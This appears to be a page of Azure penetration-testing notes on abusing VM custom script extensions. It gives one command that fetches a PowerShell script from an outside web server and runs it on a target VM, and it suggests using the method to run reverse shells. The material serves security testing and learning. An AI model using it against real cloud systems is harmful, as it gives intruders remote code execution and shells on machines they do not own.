search
githubEdit

Executing VM extensions

hashtag
Azure VM extensions are tools used by administrators to configure VMs after they have been deployed. As a way of customizing these extensions for different uses, Microsoft allows for custom script extensions to be created, based on a schema that they have defined.

hashtag
This schema includes file URIs or URLs that point to script files that allow us to specify a PowerShell file that we want to execute. As attackers, we will need a web server to host the file URIs.

hashtag
The command for running the custom script extension consists of the following parameters:

  • ResourceGroupName: The resource group for the VM.

  • VMName: The name of the VM.

  • Location: The region the VM is in.

  • FileUri: The HTTP/HTTPS URL for the script file.

  • Run: The file to run; this should be the same as the ps1 filename.

  • Name: The name that the custom script extension will have:

hashtag
Command example:

Set-AzVMCustomScriptExtension -ResourceGroupName TEST -VMName PentestVM -Location westcentralus -FileUri 'http://book.azurepentesting.com/whoami.ps1' -Run 'whoami.ps1' -Name CustomScriptExtension (Use this to run your reverse shells)
PreviousDynamic Group Memberships exploitationNextIllicit Consent Grant phishing

Last updated